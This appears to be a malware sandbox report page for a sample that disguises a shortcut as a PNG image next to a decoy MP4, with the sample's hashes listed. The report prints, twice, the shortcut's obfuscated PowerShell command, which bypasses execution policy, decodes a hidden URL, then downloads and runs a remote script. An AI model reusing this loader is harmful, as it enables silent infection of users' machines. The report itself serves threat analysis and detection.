Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
cde7c6c5c307034cf66bb22f595a7308
Sha1
5438b5dd6ab76278ab71270fd69e11bdc61c1c73
Sha256
a5b4236c1cb73f74e699be14378ca9c623055cc7bccfe24bbcf20c5554c2435b
Sha384
ee876c899f6c2629374869351cf8ad8502e9ce7d07602644ddf5b7e52df3f4fe9bdb5337b5576e272793eb1f621b9734
Sha512
40aed34d538771fe068e13458e4739fee7b779a648088d35cd469b76f83e0f84637e10f41cf13bbb35ba05e5b7365d839894ddbbd7da06465548996988d525ae
SSDeep
48:9ahJjGDLBQ2xT6Nu3xxPxgyd87gRotZU7VSiQSEVkc3z:YKpQ2hFhxjdutZSSTVkc3z
TLSH
3F512A2EED0079B0C54305784AA90D0D667E634180D21FCA642D2E81AD9F3AE1BF6B8F
File Structure
cde7c6c5c307034cf66bb22f595a7308
Malicious
MP-558018718.mp4
IMG-368331179.png.lnk
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$d=[bigint]\"16051933424968457557552224499119\";$k=[bigint]\"13150934993480775299228704447705\";$r=$d -bxor $k;while($r -ne 0){$e+=[char]([int]($r -band 0xFF));$r=$r -shr 8};iwr $e -OutFile $env:TEMP\ngWstbL.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ngWstbL.ps1"
cde7c6c5c307034cf66bb22f595a7308 (2.5 KB)
File Structure
cde7c6c5c307034cf66bb22f595a7308
Malicious
MP-558018718.mp4
IMG-368331179.png.lnk
Malicious
LNK CommandLine
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$d=[bigint]\"16051933424968457557552224499119\";$k=[bigint]\"13150934993480775299228704447705\";$r=$d -bxor $k;while($r -ne 0){$e+=[char]([int]($r -band 0xFF));$r=$r -shr 8};iwr $e -OutFile $env:TEMP\ngWstbL.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\ngWstbL.ps1"

Malicious

cde7c6c5c307034cf66bb22f595a7308 > IMG-368331179.png.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙